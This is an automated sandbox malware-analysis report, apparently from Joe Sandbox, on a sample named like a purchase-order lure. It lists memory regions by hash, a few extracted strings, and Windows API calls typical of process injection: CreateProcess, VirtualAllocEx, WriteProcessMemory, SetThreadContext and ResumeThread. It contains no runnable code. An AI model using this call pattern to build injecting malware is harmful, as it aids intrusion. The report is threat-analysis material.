                                        • Instruction Fuzzy Hash: B8524D34A002058FCB14DF68C984B99B7B2FF85314F2586A9D5586F3A2DBB5A986CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4ac79e1b5320f253213ebaf62e7df6582a99819ce91ba9b412936bf1b0dbcd6
                                        • Instruction ID: f92b5f7ac2ca9fbf306f39bb60d7281ac19d7acdddb0ec1d420827e504bef577
                                        • Opcode Fuzzy Hash: c4ac79e1b5320f253213ebaf62e7df6582a99819ce91ba9b412936bf1b0dbcd6
                                        • Instruction Fuzzy Hash: 0412C671D0061A8FCB50DF68C880AEDF7B1BF59300F11C6AAD959A7611EB70AAC5CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e13917f00fe3128f6da7cc2d08b1221bb6818d096844c91de9e8cb48d03d73aa
                                        • Instruction ID: c188c15754b74f6a2c4526e5aae85314600124dd52920204893997aea3ec7f00
                                        • Opcode Fuzzy Hash: e13917f00fe3128f6da7cc2d08b1221bb6818d096844c91de9e8cb48d03d73aa
                                        • Instruction Fuzzy Hash: AB12C771D0061A8FCB54DF68C880AEDF7B1BF59300F15C6AAD959A7611EB70AAC5CF80
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4d40ebc586581d1b40fbc92d77cac6ed4397aaeb3a674b679ed2566de810264
                                        • Instruction ID: f8d7262696dc531534574d0d249919993807cc34555bf70ffbff0f4e4641cdb2
                                        • Opcode Fuzzy Hash: e4d40ebc586581d1b40fbc92d77cac6ed4397aaeb3a674b679ed2566de810264
                                        • Instruction Fuzzy Hash: 04313835B14126CFC708CE68F5915BEBBB3AB88208F11806BE906EBA51C631CD628781
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 020d4381065a8169005dccaed889dac0c95539a14019c29346126c309ad7f293
                                        • Instruction ID: 1f1b6ef8bc30abe13d83ecc06931a775193059bd7681a79514a89645568a1ac7
                                        • Opcode Fuzzy Hash: 020d4381065a8169005dccaed889dac0c95539a14019c29346126c309ad7f293
                                        • Instruction Fuzzy Hash: C921A9B1E056188BEB18CF678C0479EFAF7AFC9304F14C1A9C50CA6265EB354A858F40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f84cea8ed58fffdf164d14091e7fc8a0a9bd97577a0a187c485e7230c9358c2
                                        • Instruction ID: f1995dcf2eb0ec59dda2d68dd9020ed66bb7bf19217eef3729271fedbb4608f9
                                        • Opcode Fuzzy Hash: 0f84cea8ed58fffdf164d14091e7fc8a0a9bd97577a0a187c485e7230c9358c2
                                        • Instruction Fuzzy Hash: 06D05E39A5D304CBCA10DEE09C413F6BABCFB1E244F443085AA0FE3201F330A8429A1A

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$Haq
                                        • API String ID: 0-4016896955
                                        • Opcode ID: 2486b87258614e50ad29bcd0036b3252e6e360cb0b945a2835b0d04cf8173d3a
                                        • Instruction ID: c74672bea7f58583cab8713caee937c73f94fa6de616ba7aafd30abf21682839
                                        • Opcode Fuzzy Hash: 2486b87258614e50ad29bcd0036b3252e6e360cb0b945a2835b0d04cf8173d3a
                                        • Instruction Fuzzy Hash: 3C815B74E003598FCB04DFA9D8946EEBFF6BF89300F14856AE409AB351DB749902CB91

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$Haq
                                        • API String ID: 0-4016896955
                                        • Opcode ID: 0970ff74c372b48036357789360f5dd10e44f95a61ae60c3251100f06dfabe1c
                                        • Instruction ID: a03875c4a34bc876ae92760cf0dcc4c32ff098a610b243f797d349dfa8e5cbe5
                                        • Opcode Fuzzy Hash: 0970ff74c372b48036357789360f5dd10e44f95a61ae60c3251100f06dfabe1c
                                        • Instruction Fuzzy Hash: 47713B34B001188FCB48EBA8D5949EE77F2FF89310B2444A9D906AB7A5CF35ED41CB61

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq$Haq
                                        • API String ID: 0-3785302501
                                        • Opcode ID: dd663b54723ca14825210a36e356638ca1754b2b97ce0536e685c5fbda8dd274
                                        • Instruction ID: 7c9b4150055c1e6c5783adc53431bad90a8c501b85c9afea55c9f3a4aa9e1be7
                                        • Opcode Fuzzy Hash: dd663b54723ca14825210a36e356638ca1754b2b97ce0536e685c5fbda8dd274
                                        • Instruction Fuzzy Hash: BE31A2707001099FCB48AFA9D8596BF7FABEFC5300F1584A9E505973A6DE348D039794

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AF20F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: b79815b756be8498f7a79d768823513dfe69d01ab4ffb1969842890f9e397406
                                        • Instruction ID: 46554cba34a3a3abcf7d81d7fc935f680e4bb165f365f058bba78806c2ad3ded
                                        • Opcode Fuzzy Hash: b79815b756be8498f7a79d768823513dfe69d01ab4ffb1969842890f9e397406
                                        • Instruction Fuzzy Hash: DDA17A71D00219CFEB24CFA8CC407EDBBB2BF44314F1485AAE909A7290DB75A985CF91

                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04AF20F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 0d1d66cc9ef06c8ae0fcee464bbbc44d3f018b3d28704a2f97abfc755f597ae8
                                        • Instruction ID: c6cd5d3f6d79f6479448d3b986d74c13e4e6df9615a5367524623b8c5f7d72d5
                                        • Opcode Fuzzy Hash: 0d1d66cc9ef06c8ae0fcee464bbbc44d3f018b3d28704a2f97abfc755f597ae8
                                        • Instruction Fuzzy Hash: 94916D71D00219DFEB24CFA8CC41BDDBBB2BF44314F0485AAE909A7290DB75A985CF91

                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 475f3ad71a6e485ca70ec9dc9b7b80fefcbe7736d681a7b95f461af48c645458
                                        • Instruction ID: acf9f6b0cbd9c32c66b3679bea42ebc9620119c170f52bca5d265f02b026627b
                                        • Opcode Fuzzy Hash: 475f3ad71a6e485ca70ec9dc9b7b80fefcbe7736d681a7b95f461af48c645458
                                        • Instruction Fuzzy Hash: 47714970A00B058FD768DF2AE49179ABBF5FF48304F00892DD586D7A50DB35E845CB91

                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 011B59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 220b8997eb5038eb50692402dd6fbc0f9b5779f2183ab0800169b78d6fbd75c3
                                        • Instruction ID: 2c743d551fab32c5a7aaa1d2aae7457142fcbc0021961f15ba31bbaf53671130
                                        • Opcode Fuzzy Hash: 220b8997eb5038eb50692402dd6fbc0f9b5779f2183ab0800169b78d6fbd75c3
                                        • Instruction Fuzzy Hash: 0141F5B1C0071DCBDB28CFA9C8847DDBBB6BF49304F20806AD408AB251D775594ACF91
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 011B59C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: efcdd31f8a4e48961321efd9240a793fe173ebd36801c0cc5f03b16203dd80a4
                                        • Instruction ID: 33c435ba9ca79c39142796059f24c3e6c4d5a507e83e469389b49dd0ee40205c
                                        • Opcode Fuzzy Hash: efcdd31f8a4e48961321efd9240a793fe173ebd36801c0cc5f03b16203dd80a4
                                        • Instruction Fuzzy Hash: 3041E2B1C00719CBDB28CFA9C985BDDBBB6BF49304F20806AD408AB255DB75594ACF90
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 050B4111
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017165313.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 308251750ee93e31e9833c32ac9813b199765664f525572c6c46f9ec09f44d23
                                        • Instruction ID: f2c8f1c15dc175c93095d05e4e32110df5feff0eaadb21c58c9609b45787d8fa
                                        • Opcode Fuzzy Hash: 308251750ee93e31e9833c32ac9813b199765664f525572c6c46f9ec09f44d23
                                        • Instruction Fuzzy Hash: 2E4129B49003098FDB14CF89C888AAEBBF6FB89314F24C458D519A7321D374A941CFA0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: cc57bd0e737a7b2901cccc43419931c9044e37ac5f012be291101fcdfedd1c2f
                                        • Instruction ID: 5b2eb4e51fe3416a422156d547e80e82076d63b1d1887dcc2212a7e724d3a493
                                        • Opcode Fuzzy Hash: cc57bd0e737a7b2901cccc43419931c9044e37ac5f012be291101fcdfedd1c2f
                                        • Instruction Fuzzy Hash: 5021E1B6C043889FCB11CF99C885BDEBFF4EF19310F14845AD544A7212D274A505CBA1
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: cdbbe3373bbe7771a5bcad8f3e6765c4210f9a96782633865b1dd5da75a5f2f7
                                        • Instruction ID: 4bcddfb60dcfcfbd2791a2e67149785b3eba075dd3f23a12f5ed968790624ffe
                                        • Opcode Fuzzy Hash: cdbbe3373bbe7771a5bcad8f3e6765c4210f9a96782633865b1dd5da75a5f2f7
                                        • Instruction Fuzzy Hash: E4314675D00249CFCB10DFA9D885AEEFBF1FF88324F148419E519AB210D735A941CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AF1CC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BD646,?,?,?,?,?), ref: 011BD707
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AF16E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,011BD646,?,?,?,?,?), ref: 011BD707
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AF1DA8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AF16E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BB079,00000800,00000000,00000000), ref: 011BB28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011BB079,00000800,00000000,00000000), ref: 011BB28A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AF1BE6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 011BAFFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2014332432.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_11b0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AF556D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2016568014.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4af0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (aq
                                        • API String ID: 0-600464949
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;k[
                                        • API String ID: 0-2043752727
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b174153262c6dd15fc4579e0cc3557336b01fb43e947151f91ca6ccadf47a39e
                                        • Instruction ID: 293e42c91d5b9b17519063a5f1551cc9a143d842b7af757b09161a5ecb7e44a4
                                        • Opcode Fuzzy Hash: b174153262c6dd15fc4579e0cc3557336b01fb43e947151f91ca6ccadf47a39e
                                        • Instruction Fuzzy Hash: F5410C30D0464A8ECB41EFA8C884AAEB7B1FF45300F05866AD559BB521EB30E9C5CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12df900bfb52e92a4b8cf60b9defec7d405dbe10cea0a7bb5853344531a08228
                                        • Instruction ID: 52a44455262fbee985e569d97bd61971eb99f1af7d82169acaeefab5b9b1f53b
                                        • Opcode Fuzzy Hash: 12df900bfb52e92a4b8cf60b9defec7d405dbe10cea0a7bb5853344531a08228
                                        • Instruction Fuzzy Hash: FA31C130B042048FCB58EB79D8546AF7BABEFC5710B1484A9D105DB3A5DF38AC06C7A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42f083c715e83afc362eed94b2b7933670ffe4009808202f315dcbc1e38cdd1f
                                        • Instruction ID: 15134465367e2beab73033578c292f489b0497db442dc470d4b23423fcc0b4a6
                                        • Opcode Fuzzy Hash: 42f083c715e83afc362eed94b2b7933670ffe4009808202f315dcbc1e38cdd1f
                                        • Instruction Fuzzy Hash: 8041BDB0D103599FDB14CF9AD988ADEFBB1BF48710F20822AE418BB250D7756845CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 578bbf234994c43c7ad6993bbda87dad9f974138551b13877bb6de7ba1280731
                                        • Instruction ID: d1ad23d6550d181ad107e31fb503c2a4ab23affb352bf7f9ffd36776fff3cd1d
                                        • Opcode Fuzzy Hash: 578bbf234994c43c7ad6993bbda87dad9f974138551b13877bb6de7ba1280731
                                        • Instruction Fuzzy Hash: 7931D370E002058FDF28EB74E4547AF7AB2EF89210F104979CA06A7395DF788A45CB96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70d1fc5e6bbf2101b74d88aa735a524486227c61b5a488ae0eca19f9b717c671
                                        • Instruction ID: fa50f7481d1b526d22b18f8764e6dac4dcfc64d19cd741d224842ff1bad6f8da
                                        • Opcode Fuzzy Hash: 70d1fc5e6bbf2101b74d88aa735a524486227c61b5a488ae0eca19f9b717c671
                                        • Instruction Fuzzy Hash: F6218271B002455FCF54DBAADD049FFBFFAAFC5200F14851AE555D3654EA709A01CBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e3def0c1f329ec7e34cd13bc55a19eea94d234fa2589f6bd9005d366198e1c85
                                        • Instruction ID: 1597ced7dd896a8b906d76d4f57e3826a8fb7647f574fb2b9ccd456d16893f9d
                                        • Opcode Fuzzy Hash: e3def0c1f329ec7e34cd13bc55a19eea94d234fa2589f6bd9005d366198e1c85
                                        • Instruction Fuzzy Hash: 892190367142018FCB58EBADF45496E73EAEFC962471540AADA06CB771EE31DC01CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51410bce8a41fa4990bb419434438690d452260119dc078c1d0b3c82bd152b37
                                        • Instruction ID: 0cc8eebb5ab4a1693062ed1b1cd7f3c339a1c9de7a1f682b227f5b7716f814e2
                                        • Opcode Fuzzy Hash: 51410bce8a41fa4990bb419434438690d452260119dc078c1d0b3c82bd152b37
                                        • Instruction Fuzzy Hash: B8310931C04B4A8ECB41EFA8C8446A9F7B0FF45300F45C6AAD4997B521EB30A9C5CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf50931afacf7fcfb814dff4db141d10d14c35b6c73deba010f521fe5e48eacc
                                        • Instruction ID: 8780028293d953f2a5133fdd3903bc9968bc140907766da7802e803357a7dd5d
                                        • Opcode Fuzzy Hash: bf50931afacf7fcfb814dff4db141d10d14c35b6c73deba010f521fe5e48eacc
                                        • Instruction Fuzzy Hash: A8318C35A05249EFCB05CF99E844EDEBFF2BF49300F1480AAE505AB261DB32D945CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
